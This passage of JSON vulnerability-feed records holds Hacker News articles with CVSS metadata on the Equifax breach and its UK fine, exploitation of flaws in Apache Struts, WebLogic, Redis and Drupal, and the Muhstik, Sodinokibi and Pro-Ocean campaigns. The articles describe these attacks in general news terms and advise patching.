["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. 
\n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. 
\n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. 
\n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than 
previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. \n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in Apache Struts 2 framework, which Apache patched over two months earlier (on March 6) of the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identified or patched its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. 
\"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). \n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. 
\n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:16", "description": "[](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. 
\n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. 
\n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. 
The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS 
score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:39", "description": "[](<https://thehackernews.com/images/-rIYNaeU1bb8/XMlFNdFL9_I/AAAAAAAAz4g/ioP3l5goEXYV6kwJvqgQXuChrtVFbUYJwCLcBGAs/s728-e100/ransomware-oracle-weblogic.jpg>)\n\nTaking advantage of newly disclosed and even patched vulnerabilities has become common among cybercriminals, which makes it one of the primary attack vectors for everyday-threats, like crypto-mining, phishing, and ransomware. \n \nAs suspected, a recently-disclosed critical vulnerability in the widely used Oracle WebLogic Server has now been spotted actively being exploited to distribute a never-before-seen ransomware variant, which researchers dubbed \"**Sodinokibi**.\" \n \nLast weekend, The Hacker News learned about a critical deserialization remote code execution [vulnerability in Oracle WebLogic Server](<https://thehackernews.com/2019/04/oracle-weblogic-hacking.html>) that could allow attackers to remotely run arbitrary commands on the affected servers just by sending a specially crafted HTTP request\u2014without requiring any authorization. \n \nTo address this vulnerability (CVE-2019-2725), which affected all versions of the Oracle WebLogic software and was given a severity score of 9.8 out of 10, Oracle rolled out an out-of-band [security update](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>) on April 26, just a day after the vulnerability was made public and several in-the-wild attacks were observed. 
\n \nAccording to cybersecurity researchers from Cisco Talos' threat research team, an unknown group of hackers has been exploiting this vulnerability since at least April 25 to infect vulnerable servers with a new piece of ransomware malware. \n\n\n[](<https://thehackernews.com/images/-NyvdVA6dbaE/XMlHegXqUiI/AAAAAAAAz40/554Hulf2uwgF6Dk-2-fXKebGk63SdLVIgCLcBGAs/s728-e100/ransomware-oracle-weblogic.png>)\n\nSodinokibi is a dangerous ransomware variant which has been designed to encrypt files in a user's directory and then delete shadow copy backups from the system in an effort to prevent victims from recovering their data without paying a ransom. \n \n\n\n## No Interaction Required to Deploy Ransomware\n\n \nSince attackers are leveraging a remote code execution vulnerability in the WebLogic Server, unlike typical ransomware attacks, deploying the Sodinokibi ransomware requires no user interaction. \n \n\n\n> \"Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device,\" researchers explain in a [blog post](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>). \n \n\"In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses.\"\n\n \n \nOnce downloaded, the Sodinokibi ransomware encrypts the victim's systems and displays a ransom note demanding up to $2,500 in Bitcoin. The amount doubles to $5,000 if the ransom is not paid within a specified number of days\u2014which may vary from two days to six days. 
\n \n\n\n## Hackers Are Also Installing GandCrab Ransomware\n\n \nResearchers also noted that roughly eight hours after deploying Sodinokibi on an infected system, the attackers exploited the same WebLogic Server vulnerability to install another piece of ransomware known as [GandCrab](<https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html>) (v5.2). \n\n\n[](<https://thehackernews.com/images/-MvaUSRB1IIk/XMlHYDSzrgI/AAAAAAAAz4o/bc94128mSTQz0yu0p92EhQ_ei9eWEiJkQCLcBGAs/s728-e100/ransomware-attack.png>)\n\n> \"We find it strange the attackers would choose to distribute additional, different ransomware on the same target,\" the researchers say. \"Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\"\n\n \nAttackers have been exploiting the Oracle WebLogic Server vulnerability in the wild since at least April 17 to distribute [cryptocurrency miners](<https://isc.sans.edu/diary/Update+about+Weblogic+CVE-2019-2725+%28Exploits+Used+in+the+Wild%2C+Patch+Status%29/24890>) and other [types of malware](<https://devcentral.f5.com/articles/oracle-weblogic-deserialization-remote-code-execution-34185>). \n \nWebLogic Server is a popular Java-based multi-tier enterprise application server typically used by businesses to support enterprise apps, which makes it an often target of attackers trying to carry out malicious operations, like running cryptocurrency miners and infecting with ransomware. 
\n \nOrganizations that use Oracle WebLogic Server should make sure to update their installations to the latest version of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-01T07:23:00", "type": "thn", "title": "Hackers Found Exploiting Oracle WebLogic RCE Flaw to Spread Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T07:31:20", "id": "THN:C3BFE86E2BE38F28D9CEB17AD2C50EBD", "href": "https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:09", "description": "[](<https://thehackernews.com/images/-QW-VuiqP65I/YBfiIyrUF2I/AAAAAAAABpg/3YIgJQiDql0yh7jOStv7rboKaQhJ5jHPQCLcBGAsYHQ/s0/malware.jpg>)\n\nA financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.\n\nDeployed by the China-based cybercrime group **Rocke**, the Pro-Ocean 
cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>) in a Thursday write-up.\n\n\"Pro-Ocean uses known vulnerabilities to target cloud applications,\" the researchers detailed. \"In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and Redis (unsecure instances).\"\n\n\"Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.\"\n\nFirst documented by [Cisco Talos](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.\n\n[](<https://thehackernews.com/images/-zGuFNfU5HYA/YBfio2D1i3I/AAAAAAAABpo/peoOu7OnqKUPriJPrJfEV-QX12XX4jSRwCLcBGAsYHQ/s0/cyber.jpg>)\n\nWhile prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by [exploiting flaws](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.\n\nBesides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets 
about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.

To achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>) to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines in the same 16-bit subnetwork (e.g., 10.0.X.X).

Pro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.

"This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure," Unit 42 researcher Aviv Sasson said. "This sample has the capability to delete some cloud providers' agents and evade their detection."
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-01T11:15:00", "type": "thn", "title": "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271"], "modified": "2021-02-01T11:15:16", "id": "THN:EEB3BA59922DDC6B345B8E6C153593DA", "href": "https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "
The Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been
exploited in the wild to deliver malware backdoors and cryptocurrency miners.

Drupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details.

However, just a day after security researchers at Check Point and Dofinity published complete details, a Drupal
